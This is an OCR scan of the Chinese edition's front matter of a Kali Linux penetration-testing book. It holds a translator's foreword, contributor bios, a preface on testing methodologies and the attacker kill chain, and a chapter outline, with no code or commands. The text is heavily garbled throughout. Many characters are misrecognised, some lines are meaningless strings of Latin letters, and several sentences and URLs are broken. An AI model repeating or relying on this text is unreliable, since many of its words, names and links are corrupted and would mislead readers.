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随 着 “网 络 空 间 安全 ”被 国务 院 学 位 委员 会 正式 批准 为 国家 一 级 学 科 ， 特 别 是 随 着 北京 邮电 大 学 等 高 校正 式 获 批 该 一 级 学 科 
博士 点 ， 网 络 空间 安全 人 才 的 培养 将 掀起 一 个 新 局 潮 : 网 络 空间 安全 学 院 将 如 雨 后 春 笋 般 ， 在 许多 局 校 成 立 ; 安全 专业 的 本 科 
生 、 硕 士 生 和 博士 生 等 人 员 规 模 将 大 幅度 提高 ， 更 多 的 精 天 人 才 进 入 网 络 空间 安全 领域 ， 从 事 严 学 研 等 活动 ;网 络 空间 安全 保障 
体系 的 整体 布局 将 更 加 全 面 、 合 理 ， 比 如 ， 将 有 更 多 的 力量 部 署 于 主动 防御 领域 等 。 


主动 防御 的 “杀手 铀 ”之 一 ， 便 是 本 书 的 主题 : 渗透 测试 。 而 它 也 是 网 络 空间 安全 教育 方面 的 弱项 。 虽 然 我 们 知道 渗透 测试 
很 重要 ， 知 道 它 可 以 评估 网 络 系统 的 安全 措施 及 策略 是 人 否 有 效 ， 知道 用 它 可 以 友 现 并 预防 潜在 的 安全 风险 ， 知 道 它 有 很 高 的 应 用 
价值 ， 但 是 ， 据 我 所 知 好 像 很 少 有 高 校 全 面 、 系 统 地 开设 过 渗透 测试 方面 的 课程 ， 通 党 只 是 零星 地 提 及 过 相关 的 拉 术 和 思路 。 我 
希望 ， 也 坚信 这 种 局 面 会 很 快 改变 ， 因 此 ， 及 时 引进 国际 上 有 关 渗 透 测试 方面 的 高 水 平 专 闭 就 显得 尤为 重要 了 。 当 然 ， 无论 是 翻 
译 还 是 撰写 渗透 测试 方面 的 书籍 ， 都 不 是 件 容易 的 事 ， 因 为 它 个 但 需要 精湛 的 文字 翻译 技巧 ， 更 需要 对 渗透 测试 的 相关 技术 和 理 
念 有 深入 的 理解 ， 还 需要 有 丰富 的 实践 动手 经 验 等 。 


Kali Linux 是 运 今 为止 ， 国 际 知名 度 很 高 ， 各 万 评价 也 很 好 的 少 有 的 计算 机 安全 检测 系统 。 它 集成 了 大 量 精心 挑选 的 渗透 测 
试 和 安全 审计 工具 。 本 书 全 面 、 系 统 且 深入 地 介绍 了 Kali Linux 在 渗透 测试 中 的 高 级 应 用 ， 堪 称 渗透 测试 方面 的 经 典 之 作 ， 是 国 
际 影响 很 大 、 权 威 性 很 高 的 专著 。 希 望 本 书 的 翻译 出 版 ， 能 够 为 国内 从 事 空间 网 络 安全 和 对 抗 的 人 员 提 供 国际 前 沿 的 技术 指南 。 


本 书 由 网 络 空 间 安全 方面 的 教授 和 专家 合作 翻译 ， 译 者 不 但 理论 水 平 高 ， 而 且 还 拥有 丰富 的 业务 实践 经 验 ， 尤 其 在 渗透 测试 
方面 更 是 实干 的 权威 行家 。 本 书 译文 忠实 原著 ， 对 某 些 难点 进行 了 反复 推 襄 ， 是 一 部 高 质量 的 学 术 译 车 。 本 书 可 作为 网 络 空间 安 
全 专业 领域 的 研究 开 友 人 员 、 工 程 扩 术 人 员 及 高 层 技 术 主 省 的 参考 书 。 希 望 也 能 够 尽快 成 为 相关 高 校 博 士 生 、 硕 士 生 和 高 年 级 大 
学 生 的 参考 书 。 
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罗伯特 W. 贝 格 斯 (Robert W.Beggs) 是 Digitial Defence 公 司 的 创始 人 和 首席 执行 官 ， 该 公司 专门 从 事 信息 安全 事件 的 预 
防 和 处 理 。 他 拥有 超过 15 年 的 安全 业务 技术 管理 经 验 ， 涉 及 有 线 和 无 线 网 络 的 渗透 测试 、 事 件 响 上 应、 数据 取证 等 内 容 。 


罗伯特 是 一 个 资深 的 信息 安全 传播 者 ， 并 且 是 多 伦 多 地 区 安全 大 会 (Toronto Area Security Klatch, TASK) 的 联合 创始 
人 之 一 ， 在 北美 多 伦 多 地 区 安全 大 会 是 众所周知 的 、 最 大 的 独立 -供应 商 安全 用 户 群 。 他 是 部 门 安全 会 议 (SecTor Security 
Conference) 咨询 委员 会 的 成 员 ， 以 及 其 他 几 个 安全 学 术 委 员 会 的 成 员 。 他 是 一 个 热心 的 安全 培训 教师， 他 在 加 拿 大 几 所 大 学 
教授 研究 生 、 本 科 生 和 继续 教育 学 生 的 信息 安全 课程 。 


罗伯特 拥有 女王 大 学 的 计算 机 科学 与 技术 MBA 学 位 ， 同 时 是 一 个 认证 信息 系统 安全 专家 。 


首先 ， 最 重要 的 是 ， 感 谢 Kali Linux 的 开 上 友 者 和 又 持 者 。 经 过 共同 的 努力 ， 他 们 创造 了 一 种 保护 网 络 和 数据 安全 的 最 重要 工 


具 。 感 谢 Packt 出 版 社 的 编辑 和 审 稿 人 的 支持 ， 感 谢 他 们 在 写作 本 书 的 过 程 中 给 予 我 无 止境 的 包容 。 我 保证 接 下 来 将 以 更 快速 度 
工作 ! 


FIRS RA tims (A (Brian Bourne) 和 TASK 的 其 他 成 员 。 他 们 给 了 我 一 个 令 人 难以 置信 的 机 会 ， 与 最 好 的 安全 极 客 社 


区 学 习 和 分 享 知识 。 
在 本 书 的 写作 过 程 中 ， 我 的 家 人 给 了 我 源源 不 断 的 动力 和 支持 。 谢 谢 莎 拉 、 亚 历 克 斯 和 安妮 卡 。 
最 后 ， 特 别 感谢 我 的 母 杀 和 父 杀 (我 不 记得 何 时 学 会 了 阅读 ) ， 在 他 们 的 鼓励 下 ， 我 养 成 了 读书 的 习惯 。 


谢谢 。 


Terry P.Cutler 是 网 络 安全 专家 ，|T 安 全 和 数据 防御 公司 Digital Locksmiths 公 司 的 联合 创始 人 和 首席 技术 官 ， 该 公司 
位 于 加 拿 大 的 蒙特 利 尔 。 他 们 保护 小 企业 、 大 型 机 构 、 家 庭 和 个 人 免 受 网 络 罪犯 的 伤害 ， 据 估计 每 天 约 有 150 万 人 在 遭受 网 络 犯 
罪 的 伤害 。 


他 擅长 于 为 政府 、 企 业 、 商 家 和 消费 者 ， 预 测 、 评 佑 与 防 泡 安 全 漏洞 。 目 2005 年 起 ， 他 和 曾 在 2200 名 现场 观众 、 世 界 上 成 干 
上 万 的 直播 观众 和 录制 的 视频 的 观众 面前 ， 表 演 一 个 黑客 利用 假 的 Linkedln 请 求 入 侵 几 乎 任何 一 家 公司 。 


目 2006 年 起 ，Terry 已 经 为 孩子 、 父 母 、 执 法 机 关 提 供 互 联网 安全 。 他 认为 预防 、 街 头 宣传 和 杀 子 沟通 是 防止 孩子 被 绑 碎 或 
沦落 为 激进 与 冒险 牺牲 品 的 最 有 效 的 方法 。 给 孩子 们 保护 自我 的 知识 和 实践 技能 与 教 他们 读 和 写 同等 重要 。 在 网 
站 http://www.TheCourseOnlnternetSafety.com 上 ， 可 以 找到 更 多 的 相关 内 容 。 


他 经 常 在 媒体 友 表 关 于 家 庭 和 个 人 每 一 天 必须 面 对 的 真实 网 络 危 险 的 内 容 ， 包 括 网 络 犯罪 、 网 络 间 谍 、 安 全 故障 、 网 络 诈 骗 
等 。 他 是 一 位 公认 的 变革 型 领导 者 、 解 决 问题 者 、 值 得 信赖 的 顾问 ， 是 一 个 能 促进 各 级 组 织 共同 积极 合作 、 协 同 工 作 的 真正 人 
才 。 


Terry 从 2011 年 开始 全 职 经 营 Digital Locksmiths 公 司 ， 在 2011 年 之 前 ，Terry 供 职 于 一 家 软件 巨头 一 一 Novell。 他 加 入 这 一 
全 球 性 的 软件 公司 ， 该 公司 专业 提供 企业 操作 系统 和 身份 、 安 全 和 系统 管理 解决 万 和 案 ， 为 公司 人 在 全 世界 多 达 45000 个 用 户 和 600 
人 台 服 务 器 的 优质 客户 提供 近 术 文 持 。 


感谢 罗伯特 在 2004 年 作为 导师 ， 慷 慨 地 引导 我 在 这 个 行业 工作 ， 其 中 历尽 艰 平 、 舱 避 陷 阱 。 
现在 ， 我 已 经 成 长 为 一 名 行业 专家 ， 我 很 采 幸 能 够 与 罗伯特 及 其 他 的 读者 分 享 一 些 自 己 的 经 验 。 


特别 感谢 我 的 家 人 ， 我 的 妻子 Franca， 我 的 儿子 David 和 Matthew ， 感 谢 他 们 在 过 去 几 年 中 的 支持 、 鼓 励 、 耐 心 、 包 容 和 
无 条 件 的 爱 。 


Danang Heriyadi 是 印尼 的 一 位 计算 机 安全 研究 员 ， 专 门 从 事 逆 向 工程 和 软件 开 友 ， 拥 有 超过 五 年 的 实践 经 验 。 


Danang 目 前 在 Hatsecure 公 司 工 作 ， 是 高 级 开发 (Advanced Exploit) 与 Shellcode 开 发 (Shellcode Development) 的 
教员 。 作 为 一 位 研究 者 ， 他 喜欢 通过 他 在 Fuzzerbyte (http://www.fuzzerbyte.com) 的 博客 分 享 |T 安 全 知识 。 


感谢 父母 给 了 我 生命 ， 没 有 他 们 ， 残 不 会 有 今天 的 我 ， 我 的 女 朋 友 每 一 天 用 微笑 和 爱 支 持 我 ， 还 有 我 的 朋友 们 ， 对 他 们 的 谢 
意 我 无 以 言 表 。 


Tajinder Singh Kalsi 是 Virscent Tehnologies 公 司 的 联合 创始 人 和 技术 专家 ， 在 IT 领域 拥有 超过 六 年 的 工作 经 验 。Tajinder 
以 Wipro 拉 术 助 理 开局 了 他 的 职业 生涯 ， 接 着 他 成 为 一 名 IT 顾 问 和 培训 师 。 截 至 目前 ，Tajinder 在 印度 各 地 的 学 院 举 办 的 研讨 会 
主题 包括 信息 安全 、Android 应 用 程序 开发 、 网 站 开发 和 云 计 算 等 ; 他 的 工作 已 经 履 兰 了 超过 120 所 学 院 及 9000 多 名 学 生 。 除 了 
培训 之 外 ，Tajinder 还 有 一 个 博客 (www.virscent.com/blog) ， 他 在 博客 上 解释 各 种 黑客 技巧 。Tajinder 之 前 曾 审阅 了 由 
Joseph Muniz 和 Aamir Lakhani 编 闭 ，Packt 出 版 社 出 版 的 《Web Penetration Testing with Kali Linux》 一 书 。 


可 以 在 Facebook 的 www.facebook.com/tajinder.kalsi.tj 页 面 上 找到 Tajinder， 也 可 以 在 他 的 个 人 主 
页 www.tajinderkalsi.com 上 关注 他 。 


感谢 Packt 出 版 社 的 团队 通过 我 的 博客 联系 我 ， 并 且 再 次 给 我 这 个 机 会 。 还 要 感谢 我 的 家 人 和 杀 密 的 朋友 ， 感 谢 他 们 在 我 完 
成 这 个 项 目的 工作 期 间 给 我 的 所 有 支持 。 


Amit Pandurang Karpe 是 FireEye 公 司 的 员工 ，FireEye 是 一 个 跨国 信息 安全 公司 ,，Amit 是 服务 亚太 地 区 客户 的 支持 工程 
师 。Amit 与 他 的 妻子 Swatee 和 儿子 Sparsh 住 在 新 加 坡 。Amit 从 大 学 时 代 开 始 就 一 直 活 跃 在 开源 社区 ， 特 别 是 Pune， 在 那里 他 
组 织 了 各 种 活动 使 社区 充满 活力 ， 如 PLUG、TechPune、IT-Milan、Embedded Nirvana 等 。Amit 写 的 技术 博文 参 


Whttp://www.amitkarpe.com., 


Amit 曾 经 与 Dai Xuewu 博 士 、Qin Fei 博 士 合 著 了 《Rapid BeagleBoard Prototyping with MATLAB and Simulink) , 由 
Packt 出 版 社 出 版 。 目 前 ， 他 正 致力 于 完成 两 本 著作 《Building Virtual Pentesting Labs for Advanced Penetration 
Testing, Kevin Cardwel) #0 «Kali Linux CTF Blueprints, Cam Buchanan) 。 


感谢 开源 社区 ， 没 有 开源 社区 ， 我 不 可 能 成 功 。 特 别 感谢 Kali Linux 背 后 的 梦想 家 ， 他 们 坚持 开放 源 代码 并 且 主 动 提供 各 种 
实例 。 同 时 ， 感 谢 社 区 成 员 和 信息 安全 专家 ， 他 们 做 了 大 量 的 工作 ， 促 使 Kali Linux 成 功 。 


感谢 Packt 出 版 性 的 团队 、 编 辑 和 项 目 协 调 员 ， 他 们 坚持 做 正确 的 事情 ， 才 使 我 能 以 最 好 的 工作 状态 完成 工作 。 


感谢 Pune Linux Users Group (PLUG) 、Embedded Nirvana 组 和 VSS 的 朋友 们 ， 基 于 他 们 的 支持 我 才能 胜任 这 个 项 目 。 
感谢 在 这 一 领域 帮助 过 我 的 所 有 人 ， 他 们 都 是 我 的 民 师 葵 友 一 一 Vijay Gokhale, Sunil Dhadve, Sudhanwa Jogalekar、 


Bharathi Subramanian, Mohammed Khasim 和 Niyam Bhushan, 


最 后 ， 感 谢 我 的 家 人 ， 我 的 父母 、 我 的 吕 弟 、 我 的 儿子 、 我 的 妻子 Swatee， 没 有 他 们 一 直 以 来 的 文 持 ， 我 不 可 能 全 身心 投 
入 这 个 项 目 。 


Ashish Pandurang Karpe 是 CompuCom-Csl Systems India 公 司 的 系统 支持 专员 。Ashish 从 大 学 开始 就 一 直 活 跃 在 开源 
社区 ， 在 那里 他 能 够 组 织 各 种 活动 使 社区 充满 活力 ， 如 PLUG 和 VITLUG.。 


首先 要 感谢 开源 社区 ， 疫 有 他 们 的 帮助 ， 我 不 可 能 在 这 里 。 其 次 要 感谢 我 的 家 人 ， 他 们 是 Anuradha ( 母 杀 ) 、 
Pandurang (父亲 ) 、Sparsh (2) 、Amit (兄弟 ) 和 Swatee (嫂子 ) 。 我 要 感谢 Packt 出 版 社 的 团队 、 编 辑 和 项 目 协调 


员 ， 他 们 坚持 做 正确 的 事情 ， 才 使 我 能 以 最 好 的 工作 状态 完成 工作 。 
感谢 Pune GNU/Linux Users Group (PLUG) 。 也 感谢 我 的 导师 一 一 Vijay Gokhale 博 士 ， 他 在 这 个 领域 帮助 并 指导 我 前 
行 。 


Kunal Sehgal 从 2006 年 在 加 拿 大 乔治 亚 学 院 学 习 网 络 安全 开始 ， 他 束 一 直 从 事 IT 安 全 行业 方面 的 工作 。Kunal 一 直 与 各 种 金 


怖 机 构 合作 。 这 不 仪表 明 Kunal 具 有 关键 安全 岗位 的 经 验 ， 还 证 明 他 在 这 一 领域 是 一 位 有 价值 的 专家 。 你 可 以 在 KunSeh.com 找 
到 他 。 


Kunal 目 前 负责 欧洲 最 大 的 一 个 银行 在 亚太 地 区 的 IT 安全 运 维 项 目 。Kunal 在 各 种 不 同 的 安全 方向 上 都 积累 了 丰富 的 经 验 ， 
从 漏洞 评估 到 安全 治理 ， 从 风险 评估 到 安全 监控 。 在 专业 领域 他 总 会 更 新 最 新 动态 ，Kunal 出 版 著作 、 举 办 讲习 班 、 写 博客 ， 所 
有 工作 都 为 促进 IT 安全 。Kunal 还 持 有 多 个 证 书 ， 包 括 OSCP、CISSP、TCNA、5CISM、CCSK、Security+、Cisco Router 
Security, ISO 27001 LASHITIL, 


我 是 Backtrack 项 目 (现在 的 Kail) 的 大 力 支持 者 ， 首先， 感谢 他 们 的 核心 团队 。 值 得 一 提 的 是 ， 感 谢 那 些 无 名 人 士 , 没有 
他 们 的 训练 和 天 注 ， 我 不 可 能 迷恋 Kail。 在 个 人 方面 ， 感 谢 我 的 家 人 (KE, SUR, BF) ， 他 们 给 予 我 无 尽 的 支持 和 信任 。 我 
承认 ， 我 忽略 了 他 们 ， 沉 浸 在 网 络 世界 里 。 


BS 


本 书 致力 于 介绍 如 何 使 用 Kali Linux 对 网 络 执行 渗透 测试 。 渗 透 测试 可 以 模拟 内 部 或 外 部 的 恶意 攻击 者 对 网 络 或 系统 进行 攻 
击 。 不 同 于 漏洞 评估 ， 渗 透 测试 包括 漏洞 利用 阶段 。 因 此 ， 漏 洞 是 仔 人 在 的 ， 而 且 如 果 不 采 取 相 应 的 措施 将 会 有 很 大 风险 。 


一 在 这 本 书 中 ，\ 渗 透 测试 人 员 w 攻击 者 “和 黑客 “使 用 完全 相同 的 技术 及 工具 评估 网 络 和 数据 系统 的 安全 性 。 他 们 之 间 唯 一 的 区 别 是 他 们 
的 目标 一 数据 网 络 的 安全 或 数据 的 外 泄 。 


大 多 数 的 测试 人 员 和 攻击 者 遵循 一 个 非 正式 的 、 开 源 的 或 专门 定义 的 测试 方法 ， 指 导 测 试 过 程 。 下 面 的 一 些 方法 有 其 固有 的 
优势 : 

测试 过 程 的 部 分 方法 可 以 自动 生成 《〈 例 如， 测试 人 员 可 以 经 单 使 用 ping 扫 描 发 现 潜在 的 目标 ; 因此， 这 可 以 作为 脚本 利用 ) ， 致 励 测 试 人 员 

把 重点 放 在 发 现 和 利用 漏洞 的 技术 创新 上 。 

结果 是 可 重复 的 ， 人 允许 反复 比较 ， 交 叉 验 证 测试 的 结果， 确定 随 独 时 间 的 推移 ， 目 标的 安全 性 是 否 有 上 所 改善 。 

定义 的 方法 在 时 间 和 人 员 的 要 求 方面 是 可 见 的 ， 豆 励 成 本 控制 并 使 成 本 最 小 化 。 

测试 方法 已 经 预先 获得 客户 批准 ， 在 对 网 络 或 数据 造成 任何 损害 时 测试 人 员 免 责 。 


正式 的 方法 包括 以 下 著名 的 例子 : 


‘Kevin OrreylfjJ2imi ies: 这 种 方法 为 测试 人 员 提 供 一 个 渗透 测试 的 序列 步骤 ， 以 及 工具 的 超 链接 和 相关 命令 。 更 多 信息 请 参 
Jwww.vulnerabilityassessment.co.uk. 


.信息 系统 安全 评估 框架 (Information Systems Security Assessment Framework, ISSAE) : 这 个 综合 性 指南 的 目标 是 单一 的 网 络 
测试 ， 更 多 信息 请 参见 www .oissg.org。 


‘NIST SP 800-115， 信 息 安 全 测试 和 评估 技术 手册 : 完成 于 2008 年 ， 这 种 四 步 走 的 方法 已 经 有 些 过 时 。 然 而 ， 它 确实 为 渗透 测试 提供 了 一 
个 很 好 的 基本 步 又 总 结 。 更 多 信息 请 参见 http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pgf。 


-开源 安全 测试 方法 手册 (Open Source Security Testing Methodology Manual, OSSTMM) : 这 个 最 老 的 方法 之 一 ， 并 且 最 新 版 本 试 
图 量化 确定 的 风险 。 更 多 详细 内 容 参 见 www .osstmm.org。 
人 E 


:开放 Web 应 用 安全 工程 (Open Web Application Security Project, OWASP) : 该 工程 主要 关注 了 基于 Web 应 用 的 10 个 最 常见 的 漏 
洞 。 更 多 信息 请 关注 www .owasp.org。 


> 


渗透 测试 执行 标准 (Penetration Testing Execution Standard, PTES) : 积极 维护 ， 这 种 方法 能 完整 并 且 精 确 地 反映 恶意 者 的 行 
为 。 更 多 信息 请 关注 www.pentest-stanqard.ord。 


:攻击 (Web) 测试 框架 (Offensive (Web) Testing Framework, OWTF) : 在 2012 年 提出 ， 结 合 了 OWASEF 方 法 和 更 完整 、 严 格 的 PTES 方 
法 ， 这 是 一 个 非常 有 前 途 的 研究 方 同 。 更 多 详细 信息 请 关注 https://github.com/7a/owtf。 


但 是 ， 使 用 一 个 结构 化 的 渗透 测试 方法 可 能 会 导致 测试 过 程 陷入 泥潭 : 


-模型 中 很 少 考 虑 为 什么 要 进行 渗透 测试 ， 或 哪些 数据 是 业务 的 关键 数据 ， 并 且 需 要 保护 。 缺 少 这 至 天 重要 的 一 步 ， 渗 透 测 试 无 法 抓 住 重点 。 
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渗透 测试 不 能 反映 恶意 攻击 者 的 实际 活动 。 通 入， 客户 希望 看 到 你 能 个 E 在 一 个 特定 的 系统 中 获得 管理 上 的 访问 权 〈\ 你 可 以 打开 这 个 盒 
"32 “) 。 然 而 ， 攻 击 者 可 能 会 重点 关注 复制 关键 数据 的 方式 一 不 需要 底层 接 入 ， 或 引起 拒绝 服务 。 


为 了 解决 形式 化 测试 万 法 所 固有 的 局 限 性 ， 它 们 必须 被 整合 在 一 个 框架 中 ， 从 一 个 攻击 者 的 角度 看 这 个 网 络 框 染 ， 这 束 


">< 


是 “ 亲 链 ” (kill chain) 。 
渗透 测试 的 “ 杀 链 ”方案 


在 2009 年 ，Lockheed Martin CERT 的 Mike Cloppert 介 绍 了 这 个 概念 ， 现 在 被 称 为 “攻击 者 杀 链 ” (attacker kill 
chain) 。 当 攻击 者 攻击 网 络 时 ，“ 杀 链 ” 包 含 攻 击 者 采取 的 步骤 。 “ 杀 链 ”不 总 是 以 一 个 线性 流 呈 现 ， 因 为 一 些 步骤 可 能 会 并 
行 出 现 。 多 发 攻击 可 以 对 同一 个 目标 瞬时 进行 多 种 攻击 ， 并 且 在 同一 时 间 攻 击 步 又 可 能 此 生 重 赤 。 


在 本 书 中 ， 我 们 已 经 修改 了 Cloppert 的 杀 链 ， 使 之 能 更 准确 地 反映 攻击 者 如 何在 测试 网 络 和 数据 服务 时 应 用 这 些 步骤 。 下 
图 显示 了 一 个 攻击 者 的 典型 杀 链 : 


侦察 后 期 利用 
被 动 (间接 ) 利用 « 目标 上 的 行为 
s 主动 (直接 ) © 持久 性 


交付 阶段 


一 个 攻击 者 的 典型 杀 链 可 以 摘 述 为 : 


:侦察 阶段 。 有 一 句 格言 : "侦察 永远 不 浪费 时 则 “。 大 多 数 军事 组 织 承 认 ， 在 进攻 敌人 之 前 ， 最 好 尺 可 能 地 去 了 解 敌 人 的 一 切 信 息 。 同 样 ， 攻 
a ee 事实 上 ， 据 估计 ， 人 针对 渗透 测试 或 攻击 ， 至 少 有 70% 的 “工作 量 “ 是 进行 侦察 ! 一 般 来 说 ， 可 采用 
类 型 的 侦察 : 


被动 侦 坚 。 这 种 方式 并 不 直接 与 目标 以 敌对 方式 进行 交互 。 例 如 ， 攻 击 者 将 会 审查 公共 的 可 用 网 站 ， 评 估 在 线 媒 体 (尤其 是 社交 媒体 网 
38) , ,并 试图 确定 目标 的 "攻击 表面 “。 
一 个 详细 的 任务 将 会 产生 一 份 过 去 和 现在 的 雇员 名 称 的 列表 。 这 些 名 称 将 成 为 尝试 蛮 力 攻击 或 密码 猜测 的 基础 。 同 样 它们 也 被 用 到 社会 工程 的 


攻击 中 。 
这 种 类 型 的 侦察 很 难 从 普通 用 户 的 行为 中 区 分 出 来 。 


:主动 侦察 。 这 种 方式 可 以 被 目标 检测 到 ， 但 是 很 难 从 常规 的 背景 中 区 分 出 大 多 数 在 线 组 织 的 表现 。 
主动 侦察 期 间 的 活动 包括 物理 访问 目标 前 端 、 端 口 扫描 和 远程 漏洞 扫描 。 


-交付 阶段 。 交 付 是 选择 和 开 太 武 缮 ， 武 费用 于 完成 攻击 中 的 任务 。 精 确 的 武 费 选择 取决 于 攻击 者 的 意图 以 及 实施 路 线 〈 例 如 ， 信 助 网 络 、 
过 无 线 ， 或 通过 基于 Web 的 服务 )。 交 付 阶 段 的 影响 将 在 本 书 第 二 部 分 进行 研究 。 


利用 或 攻击 阶段 。 一 个 特定 的 漏洞 被 成 功利 用 的 时 刻 ， 此 时 攻击 者 实现 他 们 的 目标 。 攻 击 可 能 已 经 在 一 个 特定 的 情景 下 发 生 (例如 ; 通过 组 
冲 区 溢出 利用 一 个 已 知 操作 系统 的 安全 隐患 ) ， 或 者 攻击 可 能 在 多 个 情景 下 发 生 《〈 例 如 : 二 个 攻击 者 物理 访问 公司 住 万， 但 取 亿 们 的 电 语 短 ， 
此 外 ， FA a “MA SUE, BBCI EIN PDE SCF, 
HES Lm ED 。 意 攻 击 者 针对 特定 的 企业 时 ， 多 情景 攻击 是 和 常态。 


-后 期 利用 阶段 : 对 目标 的 行动 。 这 经 常 pes ed " (exfiltration phase) , XER, AAI BR oe, MIMD BDUsgiugs 
信息 作为 唯一 的 目的 《如 登录 信息 、 个 人 信 ， RUNI AS REO; Hi. TLE US KE S 例如 ， 这 一 阶段 必须 专注 于 攻击 
者 的 许多 可 能 的 行动 。 | | 

最 利 见 的 利用 活动 是 攻击 者 试图 提升 他 们 的 访问 权限 到 最 高 级 〈 纵 回升 级 ) ， 并 且 破 解 尽 可 能 多 的 账号 ( 模 同 升级 )。 


后 期 利用 : 持久 性 。 如 宋 攻 击 一 个 网 络 或 者 系统 是 有 价值 的 ， 那 么 这 个 价值 很 可 能 在 持续 攻击 下 增长 。 这 残 需要 攻击 者 持续 与 被 攻破 的 系统 


之 间 保 持 通信 。 从 防护 者 的 角度 来 看 ， 这 是 攻击 杀 链 中 最 容易 检测 到 的 一 部 分 。 


当 攻击 者 试图 攻击 网 络 或 特定 的 数据 系统 时 ， 攻 击 杀 链 是 攻击 者 行为 的 一 种 基本 模型 。 作 为 一 种 元 模型 ， 它 可 以 吸收 任何 私 
人 的 或 商业 的 渗透 测试 方法 。 但 是 ， 也 不 同 于 这 些 方法 ， 它 使 攻击 者 在 一 个 战略 高 度 上 关注 如 何 接 近 网 络 。 这 种 专注 于 攻击 者 的 
活动 将 引导 本 书 的 布局 和 内 容 。 


本 书 分 为 两 个 部 分 。 第 一 部 分 会 根据 杀 链 的 步骤 ， 详 细 分 析 每 个 阶段 。 第 二 部 分 会 专注 于 交付 阶段 和 一 些 有 用 的 方法 ， 来 明 
确 攻击 是 怎么 友 生 的 ， 以 及 如 何 用 这 种 方法 来 保护 网 络 。 


第 1 草 介绍 了 Kali Linux 的 基础 知识 和 它 支 持 渗透 测试 的 最 优 配置 。 

第 2 章 提供 了 一 个 关于 怎么 样 利用 公共 可 用 资源 搜集 目标 信息 的 背景 ， 以 及 简化 侦察 和 信息 省 理 的 工具 。 
第 3 章 介绍 用 来 获得 目标 信息 的 隐形 万 法 ， 尤 其 是 识别 漏洞 的 信息 ， 这 种 信息 可 以 充分 利用 。 

第 4 草 证 明了 可 以 用 来 找到 并 执行 渗透 的 万 法 ， 人 允许 黑客 攻击 一 个 系统 。 


第 2? 章 摘 述 攻击 者 号 样 逐步 提高 目 己 的 权限 ， 实 现 他 们 攻击 系统 的 目标 ， 包 括 盗 穷 数据 、 改 变数 据 、 友 动 更 多 的 攻击 ， 或 创 
建 一 个 拒绝 服务 。 


第 6 章 介 绍 了 怎样 设置 一 个 受 损 系统 ， 以 便 攻 击 者 可 以 任意 返回 和 继续 利用 漏洞 进行 攻击 。 

第 7 和 章 介绍 了 为 什么 可 以 在 物理 上 访问 一 个 系统 ， 或 者 与 系统 管理 者 区 马 ， 该 章 提 供 了 一 个 最 佳 的 利用 方法 。 
第 8 章 阐 明了 起 样 利用 普通 无 线 链接 来 访问 数据 网 络 与 隔离 系统 。 

第 9 章 提供 一 个 关于 获得 安全 的 、 最 复杂 的 交付 阶段 的 简要 练 述 : 暴露 在 公共 因特网 上 的 基于 Web 的 应 用 。 


第 10 草 提供 一 个 进入 系统 的 重要 万 法 ， 因 为 越 来 越 多 的 机 构 及 用 分 布 式 和 在 家 办 公有 的 模式 ， 这 种 模式 依赖 于 远程 访问 通 


言 ， 而 这 种 通信 很 容易 受到 攻击 。 


第 11 草 主要 讨论 针对 终端 用 尸 系统 上 应 用 的 攻击 ， 因 为 这 些 应 用 不 会 频繁 地 为 终端 用 尸 的 系统 提供 与 企业 的 私人 网 络 相同 
程度 的 保护 。 


附录 概述 安装 Kali Linux 的 主要 步骤 ， 以 及 怎样 采用 全 盘 加 密 来 避免 机 密 测试 数据 的 拦截 。 
学 习 本 书 需要 准备 什么 
为 了 练习 本 书 中 出 现 的 示例 ， 需 要 虚拟 化 工具 ， 例 如 VMware 或 者 VirtualBox。 


需要 下 载 和 安装 Kali Linux 操 作 系统 及 工具 套件 。 通 过 访问 互联 网 来 确保 你 的 系统 是 最 新 的 ， 并 且 安装 了 所 有 的 工具 。 


不 竹 的 是 ， 不 是 Kali Linux 系 统 上 的 所 有 工具 都 会 呈现 ， 因 为 工具 太 多 了 。 本 书 的 目标 不 是 将 所 有 的 攻击 和 选项 展现 给 读 
者 ， 而 是 提供 一 个 测试 方法 ， 这 个 方法 可 以 为 读者 提供 学 习 和 掌握 新 工具 的 机 会 ， 经 过 一 段 时 间 后 ， 将 它们 变 为 自己 的 经 验 和 知 


虽然 本 书 中 大 多 数 示例 是 基于 Microsoft Windows 的 ， 但 是 方法 和 大 多 数 工 具 是 可 以 转换 到 其 他 操作 系统 的 ， 例 如 Linux 和 
其 他 UNIX 系 统 。 


最 后 ， 本 书 应 用 Kali 来 完成 攻击 者 的 攻击 流程 ， 对 目标 系统 进行 攻击 。 你 需要 一 个 目标 操作 系统 。 本 书 的 许多 示例 是 基于 
Microsoft Windows XP 的 。 虽 然 它 在 2014 年 4 月 已 被 弃 用 ， 但 是 该 系统 为 许多 工具 提供 了 一 个 行为 标准 的 “基线 ”。 如 果 你 知 
道 怎 样 将 一 个 方法 应 用 到 一 个 操作 系统 ， 那 么 你 可 以 将 它 应 用 到 更 多 现 有 的 操作 系统 ， 例 如 Windows 7 和 Windows 8。 


本 书 的 读者 对 象 


本 书 适用 于 想 要 学 习 更 多 关于 数据 安全 知识 的 人 。 特 别 是 ， 它 的 目标 人 群 是 那些 在 实践 中 明日 为 什么 要 使 用 一 个 特定 工具 的 
人 ;而 不 是 相反 的 一 些 人 (为 了 查看 一 个 系统 是 否 有 漏洞 ， 他 们 使 用 尽 可 能 多 的 工具 ) 。 我 的 目标 是 使 读者 开 上 友 他 们 目 己 的 方法 
和 方式 来 进行 有 效 的 渗透 测试 ， 这 可 以 让 他 们 试验 和 学 习 ， 使 他 们 进步 。 我 相信 这 种 方法 是 理解 黑客 怎样 攻击 数据 系统 的 唯一 有 
效 的 方式 ; 目 然 ， 这 也 是 了 解 坚 样 在 漏洞 被 利用 之 前 弥补 漏洞 的 唯一 万 法 。 


如 果 你 是 一 名 专业 的 安全 人 员 、 渗 透 测试 人 员 ， 或 者 是 对 复杂 数据 环境 的 安全 感 兴趣 的 人 ， 那 么 这 本 书 是 为 你 准备 的 。 


第 一 部 分 “攻击 者 杀 链 


第 1 草 ” 走 进 Kali Linux 

mati ”确定 目标 一 一 被 动 侦 察 
esse ”主动 侦察 和 漏洞 扫 摘 

@ 第 4 章 ”漏洞 利用 

第 5 草 ”后 期 利用 一 一 行动 的 目的 


第 6 草 ”后 期 利用 一 一 持久 性 
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Kali Linux (Kali) 是 BackTrack 渗 透 测试 平台 的 后 继 产 品 ，BackTrack 通 常 被 认为 是 标准 工具 包 ， 该 工具 包 使 安全 数据 和 语 


音 网 络 的 渗透 测试 更 加 方便 。 本 章 介 绍 Kali， 并 着 重 讲解 如 何 定制 Kali 以 支持 高 级 渗透 测试 。 本 章 主要 的 知识 点 如 下 : 
:Kali 人 简介 
